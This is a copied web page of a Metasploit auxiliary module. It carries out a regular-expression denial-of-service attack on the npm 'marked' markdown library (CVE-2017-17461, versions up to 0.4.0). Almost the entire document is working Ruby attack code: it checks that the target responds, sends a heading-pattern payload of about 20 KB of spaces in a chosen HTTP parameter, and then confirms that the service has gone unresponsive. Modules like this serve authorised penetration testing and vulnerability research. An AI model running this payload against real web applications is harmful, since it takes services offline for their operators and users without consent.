Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/http/marked_redos.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'marked npm module "heading" ReDoS',12'Description' => %q{13This module exploits a Regular Expression Denial of Service vulnerability14in the npm module "marked". The vulnerable portion of code that this module15targets is in the "heading" regular expression. Web applications that use16"marked" for generating html from markdown are vulnerable. Versions up to170.4.0 are vulnerable.18},19'References' =>20[21['URL', 'https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not'],22['CWE', '400']23],24'Author' =>25[26'Adam Cazzolla, Sonatype Security Research',27'Nick Starke, Sonatype Security Research'28],29'License' => MSF_LICENSE30))3132register_options([33Opt::RPORT(80),34OptString.new('HTTP_METHOD', [true, 'The default HTTP Verb to use', 'GET']),35OptString.new('HTTP_PARAMETER', [true, 'The vulnerable HTTP parameters', '']),36OptString.new('TARGETURI', [true, 'The URL Path to use', '/'])37])38end3940def run41if test_service42trigger_redos43test_service_unresponsive44else45fail_with(Failure::Unreachable, "#{peer} - Could not communicate with service.")46end47end4849def trigger_redos50begin51print_status("Sending ReDoS request to #{peer}.")5253params = {54'uri' => normalize_uri(target_uri.path),55'method' => datastore['HTTP_METHOD'],56("vars_#{datastore['HTTP_METHOD'].downcase}") => {57datastore['HTTP_PARAMETER'] => "# #" + (" " * 20 * 1024) + Rex::Text.rand_text_alpha(1)58}59}6061res = send_request_cgi(params)6263if res64fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.")65end6667print_status("No response received from #{peer}, service is most likely unresponsive.")68rescue ::Rex::ConnectionRefused69print_error("Unable to connect to #{peer}.")70rescue ::Timeout::Error71print_status("No HTTP response received from #{peer}, this indicates the payload was successful.")72end73end7475def test_service_unresponsive76begin77print_status('Testing for service unresponsiveness.')7879res = send_request_cgi({80'uri' => '/' + Rex::Text.rand_text_alpha(8),81'method' => 'GET'82})8384if res.nil?85print_good('Service not responding.')86else87print_error('Service responded with a valid HTTP Response; ReDoS attack failed.')88end89rescue ::Rex::ConnectionRefused90print_error('An unknown error occurred.')91rescue ::Timeout::Error92print_good('HTTP request timed out, most likely the ReDoS attack was successful.')93end94end9596def test_service97begin98print_status('Testing Service to make sure it is working.')99100res = send_request_cgi({101'uri' => '/' + Rex::Text.rand_text_alpha(8),102'method' => 'GET'103})104105if res && res.code >= 100 && res.code < 500106print_status("Test request successful, attempting to send payload. Server returned #{res.code}")107return true108else109return false110end111rescue ::Rex::ConnectionRefused112print_error("Unable to connect to #{peer}.")113return false114end115end116end117118119